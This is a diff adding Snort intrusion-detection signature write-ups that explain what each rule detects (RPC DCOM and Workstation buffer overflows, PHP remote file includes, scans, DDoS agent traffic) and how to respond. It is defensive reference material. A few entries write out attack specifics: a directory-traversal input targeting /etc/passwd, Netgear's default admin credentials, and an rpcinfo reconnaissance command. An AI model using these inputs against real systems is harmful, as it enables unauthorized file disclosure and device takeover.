+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-8.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-8
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a FIN stealth scan is in progress. That is, packets with the FIN flag
+set have been detected that are not part of a normal TCP stream.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/279.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+279
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service attack that causes Bay/Nortel Nautical Marlin bridges to crash.
+
+--
+Impact:
+Denial of Service. Network traffic can be disrupted.
+
+--
+Detailed Information:
+Nautica Marlin bridges will crash if a UDP packet is received on the 
+SNMP port (161) which has a data length of 0.
+
+--
+Affected Systems:
+	Bay/Nortel Nautica Marlin Bridges
+
+--
+Attack Scenarios:
+The bridges can be crashed remotely.  The offending packet uses UDP 
+(which is not connection oriented) and can be easily spoofed. 
+
+--
+Ease of Attack:
+Simple.  Tools are available that can exploit this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block connections to port 161 from unauthorized hosts using firewall or 
+router ACLs.  The release notes for the only available upgrade for this 
+product do not mention this vulnerability.  The product has been 
+discontinued.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/692.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2150.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2150
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in a ttCMS or ttForum PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL in ttCMS or ttForum PHP applications, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the News.php and Install.php scripts.
+
+The vendor for these applications states that exploitation is not possible. However, proof of concepts for these issues have been circulated.
+
+--
+Affected Systems:
+Any host using ttCMS or ttForum.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via either News.php or Install.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+
+--
--- /dev/null
+++ b/doc/signatures/3215.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3215
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2206.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2206
+
+--
+Summary:
+This event is generated when an attempt is made to access ezman.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezman.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezman.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
--- /dev/null
+++ b/doc/signatures/1462.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1462
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/288.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the POP3 service on Linux systems.
+
+--
+Impact:
+An attacker can gain access to a shell running with root privileges.
+
+--
+Detailed Information:
+This rule looks for a piece of shell code (executable code) that is
+used to exploit a known vulnerability in an older version of the POP3
+daemon distributed in Linux systems.
+
+--
+Affected Systems:
+Various Linux versions.
+
+--
+Attack Scenarios:
+The attack is done remotely and gives the attacker a command shell
+running with root privileges.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your linux vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3213.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3213
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/591.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+591
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypupdated is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypupdated is using.  Attackers can also learn what versions of the ypupdated protocol are accepted by ypupdated.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypupdated run.  The ypupdated RPC service allows clients to update maps for Network Information Service (NIS), formerly known as Sun Yellow Pages.  A vulnerability exists with improper validation associated with the 'make' command used to update changes, allowing the execution of arbitrary commands as root.  
+
+--
+Affected Systems:
+HP HP-UX 10.1, 10.10, 10.20
+IBM AIX 3.2, 4.1
+NEC EWS-UX/V, UP-UX/V 
+SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3, 4.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3, 6.0.1
+Sun SunOS 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypupdated runs.  This may be a precursor to accessing ypupdated.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypupdated, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypupdated, not probes of the ypupdated service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypupdated service itself. An attacker may attempt to go directly to the ypupdated port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1749
+
+CERT
+http://www.cert.org/advisories/CA-1995-17.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS125
+
+
+--
--- /dev/null
+++ b/doc/signatures/2201.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2201
+
+--
+Summary:
+This event is generated when an attempt is made to access download.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in Matthew Wright's download.cgi 1.0.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Matt Wright's Script Archive provides a File Download script which allows users to keep track of the number of file downloads for specific files. It contains a directory traversal vulnerability where an attacker can use directory traversal techniques ("../..," for instance) within the "f" parameter, and pass these values to download.cgi to view hidden files on the server.
+
+--
+Affected Systems:
+Any web server using download.cgi version 1.0 to track file downloads.
+
+--
+Attack Scenarios:
+An attacker crafts a download.cgi URL where f=../../../../../../etc/passwd and transmits it to a vulnerable server. If the parameter matches the location of the target server's password file, the attacker can view and download the file. The attacker can use this method to view any arbitrary file, and to browse the server to discover information that may be helpful in a future attack.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses download.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable download.cgi.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1461.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1461
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2230.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2230
+
+--
+Summary:
+This event is generated when an attempt is made to access the web 
+administration interface for a Netgear router using the default username
+and password.
+
+--
+Impact:
+Administrative access to the router
+
+--
+Detailed Information:
+Netgear routers have a default username and password of "admin" and 
+"password", if this is not changed by the administrator it is possible 
+for an attacker to gain administrative access to the router.
+
+--
+Affected Systems:
+	Netgear routers
+
+--
+Attack Scenarios:
+An attacker merely needs to login to the interface using the default 
+username and password via a web browser.
+
+--
+Ease of Attack:
+Simple. NO exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Change the username and password.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2489.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2489
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with eSignal software. 
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code with
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+eSignal software provides real-time stock market data to client hosts.
+There is a vulnerability associated with eSignal that may cause a buffer overflow,
+permitting the execution of arbitrary code with the context of LOCAL_SYSTEM. 
+The buffer overflow occurs when a larger than expected data payload is supplied
+for certain message exchanges.
+
+--
+Affected Systems:
+eSignal versions 7.5 and 7.6
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed eSignal message that may cause a buffer overflow and 
+allow the subsequent execution of arbitrary code with the context of LOCAL_SYSTEM.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9978
+
+--
--- /dev/null
+++ b/doc/signatures/2316.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2316
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2327.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2327
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in BulletScript MailList CGI mailing list manager running on a server.
+
+--
+Impact:
+Information gathering and possible theft of user information.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in BulletScript MailList CGI mailing list manager running on a server.
+The script bsml.pl does not perform stringent checks when processing
+input supplied via the action parameter to the script.
+
+It may be possible for an attacker to compromise the integrity of the
+database containing information pertaining to users of the mailing list
+being managed.
+
+--
+Affected Systems:
+	All systems running BulletScript MailList.
+
+--
+Attack Scenarios:
+An attacker can supply input of their choosing using the action
+parameter.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000735.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000735
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MailAdmin.Action.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MailAdmin.Action.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/111-10.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+111-10
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+an Xmas Tree scan is in progress. That is, packets with the FIN, URG and
+PUSH flags set have been detected.
+
+In this case, indications are that the tool Nmap is in use.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/224.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+224
+
+--
+Summary:
+This traffic represents a Stacheldraht agent-to-handler communication to test whether or not the network on which the agent runs is allowed to send an outgoing packet with a spoofed source IP.
+
+--
+Impact:
+This event indicates that the Stacheldraht agent is running on a host on
+the monitored network.
+
+--
+Detailed Information:
+The Stacheldraht Distributed Denial of Service (DDoS) attack uses a tiered structure of compromised hosts to coordinate and participate in a denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  In order for an agent host to make a good participant in the distributed denial of service it must be able to spoof source IPs to elude detection.  After a host becomes an agent, a test is conducted such that an echo request packet with the source IP of 3.3.3.3 with an ICMP identification number of 666 can be sent to the handler host.
+
+--
+Affected Systems:
+Any compromised host.
+
+--
+Attack Scenarios:
+If a host has been compromised and become a Stacheldraht agent, the compromised host will be tested to see if it can spoof a source IP and making it an acceptable agent.
+
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is available for use.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Use egress filtering in your network to prevent traffic leaving your network that is not part of the internal address space so that the Stacheldraht agent will be rejected for use in the DDoS.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS193
+
+--
--- /dev/null
+++ b/doc/signatures/1316.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1316
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fuck fuck fuck".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fuck fuck fuck".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/599.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+599
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper on a Solaris host.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on which ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about what RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All Solaris hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC service.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
--- /dev/null
+++ b/doc/signatures/1415.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1415
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to a 
+broadcast address is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if any devices
+are using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP Trap daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon on the responding IP addresses.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
